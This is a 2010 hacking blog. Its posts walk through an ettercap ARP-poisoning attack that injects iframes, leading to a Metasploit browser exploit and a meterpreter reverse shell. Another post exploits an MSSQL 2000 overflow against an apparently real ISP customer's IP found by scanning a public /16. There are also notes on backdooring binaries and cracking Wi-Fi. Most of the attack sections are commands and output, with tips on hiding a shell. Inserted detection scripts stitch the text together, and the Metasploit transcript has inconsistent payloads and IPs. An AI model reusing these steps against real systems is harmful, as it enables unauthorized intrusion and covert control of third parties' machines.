Monday, October 25, 2010

Ettercap MITM browser injection with backtrack

The purpose of this post is to provide an example of how to use the freely available Linux distribution Backtrack when conducting security testing, and to give a specific example of an attack scenario with detailed instructions on the commands used and their meaning.

This is by no means an all-encompassing tutorial for using Backtrack during security/penetration testing. If you do not have a basic understanding of what Backtrack is or how it is used, I suggest you read some info about it here: http://www.backtrack-linux.org/about/ . This post is mainly to provide the readers with an overview of a common attack vector, using what I consider to be the "swiss army knife" of IT security tools.

The instructions contained below are provided for informational\educational purposes only and should only be used on networks that you control, or have permission to utilize.

Most of the techniques described here have been documented separately or similarly on other websites\blog posts. I will post a list of references at the end for further review, and to give credit where credit is due.

Let’s look at an overview of the attack scenario:

Conditions: Access to the network has already been gained, either by wireless cracking or by some other access to a wired network. The target's IP address and operating system have already been discovered, as well as the gateway IP address. Our computer, the target and the gateway are all on the same subnet. The target is a patched Windows XP machine running SP3 and IE8. We will use Backtrack 4 final release and the Metasploit framework version 3.

The attack will begin with a basic MITM (man-in-the-middle) ARP poisoning attack against a single target on a network.

The network traffic, specifically the web pages browsed by the target, will be intercepted by our computer, and an iframe will be injected into every web page viewed. This iframe will point back to our computer, which will be hosting a web page with a malicious payload (via the Metasploit framework).

When the user browses to most web pages our iframe will execute the malicious content hosted on our computer in their browser. The end result will be admin/root access to the target's computer via a meterpreter session.

Section 1: Prepare Backtrack

If you are already familiar with Backtrack you can skip this section. This is simply the steps required for preparing Backtrack after initial live boot.

Open a terminal session and type /usr/bin/start-network. This command enables networking on Backtrack.

Now we need to update Metasploit. In a terminal type cd /pentest/exploit/framework3

This brings us to the Metasploit directory. Type in svn update. At the prompt type y.

This will update the Metasploit framework with the latest modules.

Now we need to enable IP forwarding in the kernel.

Enter echo 1 > /proc/sys/net/ipv4/ip_forward into a terminal window.

Lastly we'll ensure IP forwarding is enabled in ettercap.

We need to edit the etter.conf file. However you choose to do that is up to you; I use vi. A vi tutorial is beyond the scope of this post. I suggest you check out the security researcher's best friend, Google, if you need help with vi. Type kate from a terminal for a GUI text editor, or choose it from the Utilities menu.

The file can usually be found at /etc/etter.conf if you're using Backtrack 4 Final Release.

We need to make three changes in etter.conf (the option names are ec_uid and ec_gid):

ec_uid = 0

ec_gid = 0

Uncomment the redir_command_on and redir_command_off lines below the "if you use iptables" section of etter.conf.

Section 2: Prepare Ettercap filter

Ettercap is a network sniffer that can not only log packet data but can also use filters to inject or replace data within packets. When used in a MITM attack, ettercap filters can drop packets or inject code into packets that will be forwarded to the target machine.

Enter this filter into a text file using your favorite text editor and save it as iframe.txt:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}

if (ip.proto == TCP && tcp.src == 80) {
    # the two strings of this replace (the closing body tag and the injected iframe markup) are not preserved on this page
    replace("", "");
    msg("iframe Filter Ran.\n");
}

The above filter will put our iframe right before the closing body tag on most web sites. The first block renames the Accept-Encoding request header so the server sends the page uncompressed, which is what lets the second block find and modify the HTML.

Now, from a terminal and in the same directory where you saved iframe.txt, enter etterfilter iframe.txt -o iframe.ef

This command compiles the iframe.txt file into the actual ettercap filter, or "ef" file.

A success message looks like this: Script encoded into 15 instructions.
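The filter above leaves two marks on the traffic it touches: the request header name is rewritten to Accept-Rubbish! (so the Accept-Encoding header disappears) and the response gains an iframe whose src points at a host on the local subnet. The following script, an added example that is not part of the original post, checks a captured request head and response body for both marks. The request, response and the 192.168.1.77 address are constructed samples; the private-address check is my heuristic, not something the post describes.

```python
"""Spot the two marks an iframe-injecting ettercap filter leaves on HTTP traffic.

Added example for this post, not code from the original; the request and
response below are constructed samples.
"""
import ipaddress
import re
from urllib.parse import urlparse

# Header name the filter writes in place of Accept-Encoding (same length, so
# the packet size does not change). Compared case-insensitively.
TAMPERED_HEADER = "accept-rubbish!"

IFRAME_SRC = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)


def parse_request_headers(raw_request):
    """Return {lowercased-name: value} for a raw HTTP request head."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def request_findings(raw_request):
    """List the request-side indicators of the Accept-Encoding rewrite."""
    headers = parse_request_headers(raw_request)
    findings = []
    if TAMPERED_HEADER in headers:
        findings.append("Accept-Encoding header name rewritten to Accept-Rubbish!")
    if "accept-encoding" not in headers:
        findings.append("no Accept-Encoding header (compression suppressed)")
    return findings


def suspicious_iframes(html):
    """Return iframe src values whose host is an IP literal in a private range.

    Assumption: an injected frame points back at the attacker's box on the same
    subnet, so a private-range IP literal in a frame src on a public page is
    worth a look. Frames with DNS names are left alone by this check.
    """
    hits = []
    for src in IFRAME_SRC.findall(html):
        host = urlparse(src).hostname
        if not host:
            continue
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            continue   # a DNS name, not the pattern this filter produces
        if addr.is_private:
            hits.append(src)
    return hits


# Constructed samples: a request as the target's browser would send it after
# the first filter block ran, and a response body after the second block ran.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)\r\n"
    "Accept-Rubbish!: gzip, deflate\r\n"
    "\r\n"
)
SAMPLE_RESPONSE_BODY = (
    "<html><body><p>hello</p>"
    '<iframe src="http://192.168.1.77/"></iframe>'
    "</body></html>"
)

if __name__ == "__main__":
    for finding in request_findings(SAMPLE_REQUEST):
        print("request:", finding)
    for src in suspicious_iframes(SAMPLE_RESPONSE_BODY):
        print("response: iframe to private address", src)
```

Running the check over a web proxy log or a pcap export is the practical use; on a clean request the first function returns an empty list, and on a page that only embeds frames by DNS name the second does too.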

Section 3: Launch Metasploit

From the /pentest/exploit/framework3 directory launch the Metasploit console with this command: msfconsole

You can choose your favorite browser exploit; I'm going to use windows/browser/ms10_xxx_helpctr_xss_cmd_exec

Metasploit commands (replace youripaddress with the IP of your Backtrack machine):

use windows/browser/ms10_xxx_helpctr_xss_cmd_exec

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST youripaddress

set SRVHOST youripaddress

set SRVPORT 80

exploit

Section 4: Launch Ettercap for MITM attack

Now that all of the prerequisites for the attack have been prepared, we can launch ettercap.

Enter the following command into a terminal window (replace the interface, target IP and gateway IP with the correct values for your environment): ettercap -i wlan -F iframe.ef -TqM arp:remote /targetip/ /gatewayip/ -P autoadd

The -i switch specifies the interface; you only need it if you have multiple interfaces. If you have only one you can omit it. -F specifies the filter to use. -T = text mode, -q = quiet, -M = MITM attack (here ARP poisoning in both directions, arp:remote).

You may see only one of the addresses added to an ettercap group. This is not uncommon with wireless clients. Both the gateway and the target need to show up in one of the groups. You can either wait until your target sends an ARP request or force it to by pinging a non-existent IP on your subnet from the target. The choice is yours.
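What arp:remote does to the LAN is visible from the target side: the gateway's IP suddenly resolves to a different MAC, and one MAC starts answering for several IPs at once. The script below, an added example that is not part of the original post, reads repeated `arp -an` snapshots (or any stream of IP/MAC observations from ARP replies) and raises alerts on those symptoms. The snapshots, addresses and interface name are constructed samples.

```python
"""Detect the ARP-cache symptoms an arp:remote poisoning run leaves behind.

Added example for this post, not part of the original. It takes a stream of
(sender IP, sender MAC) pairs, either from ARP replies seen on the wire or from
repeated `arp -an` snapshots, and alerts when an IP's MAC changes, when one MAC
starts answering for several IPs, or when the gateway's MAC departs from a
known-good value. Sample data and addresses are constructed.
"""
import re
from collections import defaultdict

# Matches lines of Linux `arp -an`: "? (192.168.1.1) at 00:11:22:aa:bb:01 [ether] on wlan0"
ARP_AN_LINE = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-fA-F:]{17})")


def parse_arp_table(text):
    """Extract (ip, mac) pairs from `arp -an` output, MACs lowercased."""
    return [(ip, mac.lower()) for ip, mac in ARP_AN_LINE.findall(text)]


def detect_arp_poisoning(observations, gateway_ip=None, gateway_mac=None):
    """Return (index, reason, ip, mac) alerts for a stream of (ip, mac) pairs.

    gateway_ip/gateway_mac are the known-good pairing for the default gateway,
    e.g. recorded once on a trusted day; pass None to skip that check.
    """
    first_mac = {}                   # ip -> MAC first seen for that IP
    ips_by_mac = defaultdict(set)    # mac -> IPs it has claimed
    known_gw = gateway_mac.lower() if gateway_mac else None
    alerts = []
    for idx, (ip, mac) in enumerate(observations):
        mac = mac.lower()
        if ip == gateway_ip and known_gw and mac != known_gw:
            alerts.append((idx, "gateway-mac-mismatch", ip, mac))
        previous = first_mac.setdefault(ip, mac)
        if previous != mac:
            alerts.append((idx, "ip-mac-changed", ip, mac))
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                alerts.append((idx, "mac-claims-multiple-ips", ip, mac))
    return alerts


def scan_snapshots(snapshots, gateway_ip, gateway_mac):
    """Run the detector over a sequence of `arp -an` snapshots taken over time."""
    stream = [pair for snap in snapshots for pair in parse_arp_table(snap)]
    return detect_arp_poisoning(stream, gateway_ip, gateway_mac)


# Constructed sample: a clean snapshot, then one taken while the poisoning runs.
# .1 is the gateway, .50 the target, .77 the machine running ettercap.
SNAPSHOT_CLEAN = """\
? (192.168.1.1) at 00:11:22:aa:bb:01 [ether] on wlan0
? (192.168.1.50) at 00:11:22:aa:bb:50 [ether] on wlan0
? (192.168.1.77) at 00:11:22:aa:bb:77 [ether] on wlan0
"""
SNAPSHOT_POISONED = """\
? (192.168.1.1) at 00:11:22:aa:bb:77 [ether] on wlan0
? (192.168.1.50) at 00:11:22:aa:bb:77 [ether] on wlan0
? (192.168.1.77) at 00:11:22:aa:bb:77 [ether] on wlan0
"""

if __name__ == "__main__":
    for alert in scan_snapshots([SNAPSHOT_CLEAN, SNAPSHOT_POISONED],
                                "192.168.1.1", "00:11:22:aa:bb:01"):
        print(alert)
```

On the sample data the poisoned snapshot produces a gateway mismatch and an IP-to-MAC change for the gateway, the same change for the target, and two "one MAC, several IPs" alerts; the clean snapshot alone produces none. A static ARP entry for the gateway on the client, or dynamic ARP inspection on the switch, is the usual mitigation once this is seen.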

Once ettercap is running, open up IE on your target and browse somewhere; I used test.com. You should see the "iframe Filter Ran" message on your Backtrack box.

You should also see the exploit initiate in the Metasploit terminal. On your victim box a message will pop up. If you click Allow, the exploit will run.

You should then see a meterpreter session initiated on your Backtrack computer.

You can hit CTRL+C and then type sessions -i 1 (that's the number 1) to interact with the meterpreter session.

You've compromised the box! You can now do things like drop to a command shell on the target by entering shell into meterpreter. Or, if you want to be surreptitious, you could enter execute -f cmd.exe -i -H -c. There are many things you can do with a successful meterpreter session: you can upload/download files, grab password hashes, send over a secure back door program like netcat, edit the registry... really whatever you want to do.

I hope you've found this post helpful and will use it as a catalyst for more research into the kinds of things you can do with Backtrack and Metasploit.

References

http://www.irongeek.com/i.php?page=security/ettercapfilter

http://www.backtrack-linux.org/

http://hi.baidu.com/artcracker/blog/item/86209ed411e1cac850da4b15.html

http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5078.msg25656/topicseen,1/

http://www.irongeek.com/i.php?page=videos/deploying-metasploits-meterpreter-with-mitm-and-an-ettercap-filter

http://forum.intern0t.net/offensive-guides-information/603-arp-poisoning-mitm-attack.html

Backtrack R1

The guys at Offensive Security have surprised us with another security leap right before the year ends: Backtrack R1. After more than 6 months of production and joint work with Blackhat, they have once again put together some of the best security tools and updates there are. Below is the update log:

* A New kernel (2.6.34)
* Massively improved hardware support
* Support for new wireless drivers
* Official FluxBox Support
* A battery of new tools added
* Some additional surprises

For those of you who are hearing of BackTrack for the first time: BackTrack is a Linux-based penetration testing arsenal that aids security professionals in performing assessments in a purely native environment dedicated to hacking. Regardless of whether you make BackTrack your primary operating system, boot from a LiveDVD, or use your favorite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

Wednesday, July 21, 2010

Metasploit MSSQL Exploit

The following exploit is for Microsoft SQL Server.

Requirements
Metasploit framework
NMap

Microsoft SQL Server listens on port 1433 and port 1434. Port 1433 is a TCP (Transmission Control Protocol) port, while 1434 is a UDP (User Datagram Protocol) port. For Nmap we will be using a SYN scan. A SYN scan is pretty much like playing ding-dong ditch: a regular connection requires a three-way handshake, whereas a SYN scan initiates the handshake, waits for a reply, then leaves. In Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow: "This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3)."

The first step is to find a vulnerable host. To do this we will be looking for a host that has port 1434 open. When I scan hosts with Nmap I always give it a range so I have a better chance of getting a hit. I also have the command write its output to a file so I have it on record and it is easier to search.


# nmap -sU -p1434 -P0 -sS 24.151.0.0/16 >> /home/user/1434.txt

-sU   UDP scan
-p    which port to scan, in this case 1434
-P0   don't ping the host first
-sS   SYN scan; this is for TCP but I'm in the habit of always using it
IP    the IP address 24.151.0.0
/16   subnet suffix, in this case 16 = 255.255.0.0
>>    where the output file is going to be written

The scan is going to take a while; we are scanning 65,025 hosts. When the scan is done, or after 30 min, feel free to start searching the output file for anything that says open.

Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s
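For the two steps just described, grepping the scan output for open 1434/udp and recognising the datagram shape the exploit relies on, here is an added example that is not code from the original post. The first function parses the "Interesting ports on ..." format Nmap printed above and lists hosts reporting 1434/udp as open (a useful inventory of exposed SQL Resolution Service endpoints); the second flags UDP/1434 datagrams that begin with 0x04 and carry an overlong string, which is the shape the quoted module description gives. The scan text, datagrams and 192.0.2.x addresses are constructed, and the 64-byte threshold is an assumption for illustration.

```python
"""Triage helpers for the UDP/1434 exposure discussed above.

Added example for this post, not code from the original. The sample scan text
and datagrams are constructed; the length threshold is an assumption.
"""
import re

# Nmap host banner, with or without a resolved name:
#   "Interesting ports on host.example (192.0.2.10):"  or  "Interesting ports on 192.0.2.11:"
HOST_LINE = re.compile(r"^Interesting ports on (?:\S+\s+)?\(?(\d+(?:\.\d+){3})\)?:")
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def hosts_with_open_port(nmap_text, port=1434, proto="udp"):
    """Return the IPs whose scan block reports <port>/<proto> with state 'open'.

    Nmap's 'open|filtered' UDP verdict is deliberately not counted: it means
    no reply at all, not a confirmed listener.
    """
    found = []
    current = None
    for line in nmap_text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            current = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m and current:
            p, pr, state, _service = m.groups()
            if int(p) == port and pr == proto and state == "open":
                found.append(current)
    return found


# Assumption: a legitimate 0x04 instance-name lookup carries a short instance
# name; the vulnerable service overflowed on long ones, so anything past this
# length is treated as suspect.
MAX_INSTANCE_REQUEST_LEN = 64


def classify_ssrp_datagram(payload, dst_port=1434):
    """Classify one UDP payload sent to the SQL Server Resolution Service."""
    if dst_port != 1434 or not payload:
        return "ignore"
    if payload[0] != 0x04:
        return "ssrp-other"          # e.g. 0x02 browse/enumeration requests
    if len(payload) > MAX_INSTANCE_REQUEST_LEN:
        return "alert-oversized-instance-request"
    return "instance-request"


def alerts_for(datagrams):
    """datagrams: iterable of (src_ip, dst_port, payload) records from a capture."""
    alerts = []
    for src, port, payload in datagrams:
        verdict = classify_ssrp_datagram(payload, port)
        if verdict.startswith("alert"):
            alerts.append((src, verdict))
    return alerts


# Constructed sample scan output in the format shown above.
SAMPLE_SCAN = """\
Interesting ports on host-a.example (192.0.2.10):
PORT     STATE         SERVICE
1434/udp open          ms-sql-s

Interesting ports on 192.0.2.11:
PORT     STATE         SERVICE
1434/udp open|filtered ms-sql-s
"""

# Constructed sample datagrams: a normal instance lookup, a browse request,
# an oversized 0x04 request, and an oversized packet to the wrong port.
SAMPLE_DATAGRAMS = [
    ("192.0.2.20", 1434, b"\x04MSSQLSERVER"),
    ("192.0.2.21", 1434, b"\x02"),
    ("192.0.2.22", 1434, b"\x04" + b"A" * 600),
    ("192.0.2.23", 1433, b"\x04" + b"A" * 600),
]

if __name__ == "__main__":
    print("hosts with 1434/udp open:", hosts_with_open_port(SAMPLE_SCAN))
    print("alerts:", alerts_for(SAMPLE_DATAGRAMS))
```

The same datagram rule, expressed as an IDS signature, is how the worm that abused this service was caught in 2003; the Python form is handy for a one-off pass over a pcap export or a UDP log.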


So now that we have found a potential box to attack, we try to exploit it. I will be using the Metasploit 2 console for this attack; Metasploit 3, the GUI and the web interface will all work as well.

# msfconsole
[*] Starting the Metasploit Framework...

+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > use mssql2000_resolution
msf mssql2000_resolution > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     1434       The target port

  Payload:    Name      Default                                       Description
  --------    --------  --------------------------------------------  ----------------------
  required    EXITFUNC  process                                       Exit technique: "process", "thread", "seh"
  required    METDLL    /home/framework/data/meterpreter/metsrv.dll   The full path the meterpreter server dll
  required    LPORT     4444                                          Listening port for bind shell

  Target: MSQL 2000 / MSDE

msf mssql2000_resolution(win32_bind_meterpreter) >

msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76

msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter> use -m Process
loadlib: Loading library from 'ext227496.dll' on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Starter interactive channel 1.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


When you get to the shell you can run whoami and you will see that you are logged in as NT AUTHORITY\SYSTEM, which means you have Administrator rights. Now your imagination is the limit.

Wednesday, May 26, 2010

How to Break in and Stay in

NOTE: This is only meant for educational purposes.
In this tutorial I explain how easy it can be for someone to hack into your computer or network and maintain access at any later time. The art of hacking comes only when you can break in and stay in. Most attacks are noticed as soon as they take effect, and the victim is likely to block or patch the attack. In such a case you will need a way to still get in without having to run a pile of exploits on the victim's box. We look at how useful Meterpreter services (metsvc) can be and how you can crack password hashes in a few seconds. I also demonstrate the use of filter files with ettercap to make a spoofed attack.




Monday, May 3, 2010

Installing spoonwep2 and spoonwpa on BackTrack 4

In case you need more visual help on installing spoonwep and spoonwpa, you can watch the video.

First you'll need to download Spoonwep2 and Spoonwpa and unpack them into /tmp/:

cd /root/Desktop
mkdir /tmp/{spoonwep2,spoonwpa}
wget hxxp://shamanvirtuel.googlepages.com/SWPA.lzm
wget hxxp://neovortex.kodings.googlepages.com/spoonwep2.lzm
lzm2dir SWPA.lzm /tmp/spoonwpa
lzm2dir spoonwep2.lzm /tmp/spoonwep2

Then copy the unpacked trees into place (the source paths match the lzm2dir targets above):

cp -rpv /tmp/spoonwpa/usr /
cp -rpv /tmp/spoonwep2/usr /

Next, create two wrapper scripts so that spoonwep and spoonwpa can detect the interfaces. Each wrapper temporarily points /bin/sh at bash while the tool runs, waits for the capture file to appear, links it under the .txt name the tool expects, and restores /bin/sh to dash afterwards.

Spoonwep

echo "#!/bin/bash
chmod 777 /usr/local/bin/wifispoonfeeder/
rm /bin/sh
ln -s /bin/bash /bin/sh
spoonwep
sleep 1
# wait until spoonwep has written its capture file
while ! [ -e /usr/local/bin/wifispoonfeeder/spoonwep/tmp/wscapture-01.csv ]
do
sleep 1
done
ln -s /usr/local/bin/wifispoonfeeder/spoonwep/tmp/wscapture-01.csv /usr/local/bin/wifispoonfeeder/spoonwep/tmp/wscapture-01.txt 2>/dev/null
# restore the default shell
rm /bin/sh
ln -s /bin/dash /bin/sh" > /usr/bin/spoonwep.sh



Spoonwpa

echo "#!/bin/bash
chmod 777 /usr/local/bin/wifispoonfeeder/
rm /bin/sh
ln -s /bin/bash /bin/sh
spoonwpa
sleep 1
# wait until spoonwpa has written its capture file
while ! [ -e /usr/local/bin/wifispoonfeeder/spoonwpa/tmp/wscapture-01.csv ]
do
sleep 1
done
ln -s /usr/local/bin/wifispoonfeeder/spoonwpa/tmp/wscapture-01.csv /usr/local/bin/wifispoonfeeder/spoonwpa/tmp/wscapture-01.txt 2>/dev/null
# restore the default shell
rm /bin/sh
ln -s /bin/dash /bin/sh" > /usr/bin/spoonwpa.sh


Now make them executable:
chmod 755 /usr/bin/{spoonwep.sh,spoonwpa.sh}

You want to make sure that they appear in the BackTrack menu, so let us move the desktop files and edit the command:
mv /usr/local/share/applications/spoonw* /usr/share/applications/

Open up spoonwep.desktop in any text editor of your choice and change the Exec line, giving:

[Desktop Entry]
Comment=
Exec=spoonwep.sh
GenericName=
Icon=cache
Name=SpoonWep2
Path=
StartupNotify=true
Terminal=0
TerminalOptions=
Type=Application
X-KDE-SubstituteUID=false
X-KDE-Username=
Categories=BT-Radio-Network-Analysis-80211-Cracking


For Spoonwpa:

[Desktop Entry]
Comment=
Exec=spoonwpa.sh
GenericName=
Icon=cache
Name=SpoonWpa
Path=
StartupNotify=true
Terminal=0
TerminalOptions=
Type=Application
X-KDE-SubstituteUID=false
X-KDE-Username=
Categories=BT-Radio-Network-Analysis-80211-Cracking


Let's update our menus. From the command line type:
update-menus

Your Spoonwep2 and Spoonwpa are all set and ready to use.

Saturday, April 24, 2010

Metasploit backdooring

With Metasploit it's possible to take any Windows binary file and use it as a backdoor on a victim's computer; you can then gain a Meterpreter shell at any point. All that is needed is to embed the Metasploit payload into any executable that you want.

Monday, April 19, 2010

Bluetooth discovery with Ruby

#!/usr/bin/ruby
# file: whereib.rb
# Polls a known Bluetooth address with hcitool and reports whether the device answers.

deviceid = '00:0E:6D:29:38:EB'
devicename = 'Nokia 6600'

# The loop bound did not survive on the page ("while count <>"); poll until interrupted.
loop do
  # hcitool name returns the remote device name only while the device is in range
  if `hcitool name #{deviceid}`.chomp == devicename
    puts devicename + ' IN RANGE'
  else
    puts devicename + ' OUT OF RANGE'
  end
  puts Time.now
  sleep 7
end